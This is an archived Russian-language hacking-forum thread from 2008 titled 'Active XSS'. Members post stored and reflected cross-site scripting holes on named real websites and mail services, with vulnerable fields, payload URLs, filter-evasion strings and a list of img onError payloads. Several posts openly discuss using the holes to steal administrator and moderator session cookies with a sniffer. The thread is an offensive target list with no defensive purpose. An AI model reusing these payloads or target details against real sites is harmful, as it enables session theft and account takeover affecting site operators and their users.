ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

Лайт 15.06.2008 18:24

Случайно нашел доску объявлений.
Уязвимы все комменты к товарам.
http://stolbik.kiev.ua/b5111492.html
А в поиске сидит пассивка:
_http://stolbik.kiev.ua/search_sp.php?text=%22%3E%3Cscript%3Ealert%28%27XS S+from+Light%27%29%3C%2Fscript%3E&group=0&search_b utt.x=28&search_butt.y=9

Лайт 15.06.2008 19:26

Вот еще: http://www.inox.ua/?check=guest_book&lt=1213543321953
Уязвимые поля: Имя, www, сообщение.
Частенько админ заглядывает в гостевую и коментит, можно его поймать)))
В поиске тоже сидит пассивка.

__________
Админ прикрыл посты без модерации, но XSS осталось, поэтому когда одмин будет просматривать, его можно накормить снифером...

Лайт 16.06.2008 05:45

Вот какого зверя я нашел на этот раз: http://www.ilovedress.ru/catalogue/shops/?pid=168
уязвимым оказалось имя пользователя
ЗЫ Админка тоже на глаза попалась http://www.ilovedress.ru/admin/login.php

Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0

____________
Админ прикрыл гостевую, наверно фильтр поставит(((

MaSTeR GэN 16.06.2008 08:15

Цитата:

Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0
хочешь удивиться ? ))) выскакивает alert(document.cookie)
;) просто в куках кроме id cессии не чего нет )

Лайт 16.06.2008 14:44

Цитата:

Сообщение от MaSTeR GэN
хочешь удивиться ? ))) выскакивает alert(document.cookie)
;) просто в куках кроме id cессии не чего нет )

Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.

А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail....08?add-comment

xcedz 16.06.2008 15:52

Цитата:

Сообщение от Лайт
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.

А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail....08?add-comment

хотелось секаса с девчиной, а получился xss "активный"(с) :D

Лайт 17.06.2008 00:40

Вот моя вечерняя XSS, есть над чем поугарать, специально для самых внимательных.
http://www.tabacum.ru/showinfo.php?id=63
Поля: имя и коммент

xcedz 17.06.2008 05:12

planeta.rambler.ru
Для теста создал два ака.
Создал в одном сообщество. (вот тут первая хцц)
в названии..
(что то типа бла бла бла //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>)

мои настройки: премодерация- включена
участвуют все желающие
писатели- участники
читатели -участники сообщества
эксперты- назначает автор тобишь я

===========
Далее. назначаем эксперта нашего сообщества (пока себя самого) - + добавляем экспертные области опять же внедряем свой код
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT> ( в приципе можно воспользоваться :) )
=================
теперь вторым аком заходим в наше сообщество и подаем заявку на вступление
=================
ну и попробуем добавить запись в наше сообщество
олерте :D
(ЗЫ акк чела должен быть в ваших друзьях)
=================
поиграйтесь с настройками, может я что то упустил ;)
ъхэк!

MaSTeR GэN 17.06.2008 17:32

businessweek.com
полезно иногда новости читать ;)
постим коммент к новости
Код:

<iframe src=http://ha.ckers.org/scriptlet.html <
содержание scriptlet.html думаю сами понимаете ))
Код:

<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
воврашаемся обратно по линку с новостью )) вуаля )
для примера вот news ;)
http://www.businessweek.com/technology/content/jun2008/tc20080616_034849.htm?chan=technology_technology+i ndex+page_top+stories

P.S вся эта радость работает из за отображения последнего коммента во время поста нового но на странице где отображаються все комменты все нормально фильтруеться )

freddi 17.06.2008 17:33

fotki.yandex.ru

уязвимо поле "Альбом". ничего не фильтруется.

Лайт 19.06.2008 07:53

http://www.oke.ru/xo4u.php?id=-42717
Поля имя и мыло

l1ght 25.06.2008 21:11

комментарии на wiki.xakep.ru собственно пример:
Код:

http://wiki.xakep.ru/(S(binh5p451x3ngf45fdpipz55))/fononnyi_kompyuter.ashx?Discuss=1&NoRedirect=1

desTiny 29.06.2008 15:38

продолжим с гуглом...
greetz to xcedz, закобяка ты ендакая..

Заходим в группы и заливаем в файлы html-файл.
Вот пример:
http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWP VPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY

Ъхек :)

xcedz 29.06.2008 15:40

Цитата:

Сообщение от desTiny
продолжим с гуглом...
greetz to xcedz, закобяка ты ендакая..

Заходим в группы и заливаем в файлы html-файл.
Вот пример:
Код:

http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWPVPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY
Ъхек :)

прости друк, я не хотел :(

Kusto 29.06.2008 23:45

коментарии вот собственно пример
http://www.new-most.info/press-centre/announcements/4508.htm#comment

Блин- в алерте написал Россия-чемпион (сайт был украинский) теперь прежде чем вывесить комент комент пишет что типа ваш комент будет добавлен после проверки модератором)))- а мож это и неплохо совсем- так окажется гарантия если прийдут куки то что куки модера или админа)))

base 30.06.2008 13:44

ozon.ru
В отзыве на товар, уязвимое поле Страна/город. Недостаток в том, что нужно ждать два/три дня пока отзыв отправится в паблик.
Пример: http://www.ozon.ru/context/detail/id/3819533/

Код:

<td colspan="3" align="right" class="vertpadd"
style="padding-right:20px; color:Gray;">Мамедов&nbsp;
(<a href=/context/client_opinion/ClientGuid/9596607c-384f-4f1e-a17f-ac49e92840c4/>все отзывы</a>),
Москва<fuck>, 21 год
        </td>


BlackSun 30.06.2008 20:03

Пров Дом.сру, биллинг
http://tmn.citydom.ru/bill/
Активная ксс у операторов в статистике (в забаненных логинах, при большом кол-ве неправильных попыток), уязвимо поле Логин

scrat 03.07.2008 21:53

moskva.ru - ставим имя
Цитата:

<script>alert('xss')</script>
заходим в поиск по интересам и вуаля алерт сработал :) чувствую там ещё много багов будет :)

xcedz 10.07.2008 20:10

Ку! дяди хакеры, снов я - флудер очата:

http://my.mail.ru/mail/sq2inj/

вы должны зайти в свой мир и перейти на мою страничку .
Поскольку сами не дураки то надеюсь догадаетесь как реализовать. ну и еще есть возможность загрузки swf (догадываетесь о чем я?)

чмоке зайки =)

Зы, l1ght- не зачет. не похекерске, а еще ты поддакивалка.

xcedz 11.07.2008 00:41

Цитата:

ну и еще есть возможность загрузки swf (догадываетесь о чем я?)
Пример
Мейл ру
логинимся и дуем поссылочке
http://music.my.mail.ru/05091c0018001b0512090302061801021405030455515c5355 0750040d0e01035b5554025c000a50595f0755075d000d06.s wf

BlackSun 11.07.2008 03:46

http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html

---------
Жаль, что ток у мну пашет ( -deleted-

xcedz 12.07.2008 15:16

Цитата:

Сообщение от BlackSun
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html

---------
Жаль, что ток у мну пашет ( -deleted-

пашет!

пример http://r27.vip-file.com:81/download9/12-6c6fdb33afc47e1c2f817a460aa79c40/as.html

sabe 13.07.2008 10:12

20minut.ua PR 4
Цитата:

http://20minut.ua/?lang_code=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua
активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )

-=Static=- 17.07.2008 04:12

_http://www.e-xoopport.it/modules/news/

Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)

BlackSun 19.07.2008 19:10

NextMail.ru

Активная ксс, старенькая, но ужось, все еще пашет :D

Шлем письмо ..
Цитата:

<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value='javascript:alert();'></object>

Dimi4 03.08.2008 12:50

http://novy.tv/services/chat/
Чат "Нового Канала"

Если кто узнает движок, сообщите плз, такой же у прова стоит...

Регаемся, заходим (visto:visto)

Слева, там где Интонация, выбираем "настройка", добавляем свой вариант -
Цитата:

"><script>alert(/Dimi4/)</script>
В меню --- записная книжка --- добавляем запись:

Цитата:

%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2 f%44%69%6d%69%34%2f%29%3c%2f%73%63%72%69%70%74%3e
Ну вообщем может кому пригодится..
и еще фича: если написать в чате сообщение !b blabla !
то текст blabla беоеться в теги
Цитата:

<b> blabla </b>

BlackSun 04.08.2008 01:14

iol.pt
Активная XSS в почте,
Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX )
Шлем письмо,
Para: - кому,
Assunto: - ксс - <script>alert()</script><noscript>

// BlackSun

Frozzeg 04.08.2008 14:20

krasnodar2000.ru

Активная XSS в комментах новостей
Уязвимые поля "Ваше имя", "Город"

Frozzeg 04.08.2008 14:36

nevasport.ru


Активная XSS в комментах новостей
Уязвимое поле "Ваше имя"

Frozzeg 05.08.2008 21:15

seonews.ru

Активная XSS в комментах новостей
Уязвимое поле "Имя"

Bonnie and Clyde 07.08.2008 08:13

Активная XSS в бесплатной почтовой системе NextMail.ru
@nextmail.ru
@nxt.ru
@epage.ru
@email.su
@student.su
@hu2.ru
@xaker.ru
@mail2k.ru
@dezigner.ru
@programist.ru
@onlymail.ru
@logmail.ru
Отправляем письмо адресату с прикрепленным файлом, в прикрепленном файле пишем код.
(прим.: <script>alert(document.coocke);</script>)

XSS работает только(!) в IE (по крайней мере у меня в Опере и Мозилле не сработало)

BlackSun 07.08.2008 08:31

Bonnie and Clyde, работает и в ие, и в опере, и в фф:
https://forum.antichat.ru/showpost.php?p=779537&postcount=229

mailbrush 08.08.2008 12:28

Код:

_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E


Calcutta 10.08.2008 14:30

Блог:
http://blogspot.com/

пример первой попавшейся xss. при создании своего блога вписываем алер и:
http://1111vvv.blogspot.com/

NFM 10.08.2008 21:28

от нее смысла нету. куки она не передает так как куки идут с блогера. только если связку ставить или редирект

Calcutta 13.08.2008 13:49

http://mymail-in.net/
срабатывает 11 XSS в теле письма. проверено с помощью "SMTP XSS Tester v1.0"
// Наверное это можно считать за активную xss?

echobyte 13.08.2008 20:58

http://nexile.ru/href/5713.html

В обьявлениях фильтруется script
соответственно "><scr<script>ipt>alert()</scr</script>ipt>

Calcutta 14.08.2008 09:59

Сервер: mail.km.ru
зарегал мыло на http://bossmail.ru/
создаем письмо, вписываем в него алерты с таким телом письма:
Код:

<body>
<img src="a"onError=alert(121)>
<img src='a'onError=alert(122)>
<img src=javascript&#13:alert(79)>
<img src=javascript&#10:alert(68)>
<img src=javascript&#9:alert(57)>
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(46)>
<img src=javascript:alert(16)>
</body>

открываем письмо у себя в папке или отправляем его с небольшими изменениями ; )

echobyte 14.08.2008 18:54

http://fotocelebrity.net/anna-seminovich/anna-seminovich27.php

NApoleonchik 15.08.2008 16:39

xss
 
PR 2
тИЦ 10


http://www.auto-magnitola.ru/forum/index.php

Уязвимы все поля в форуме. Ничего не фильтруется

))


Время: 19:25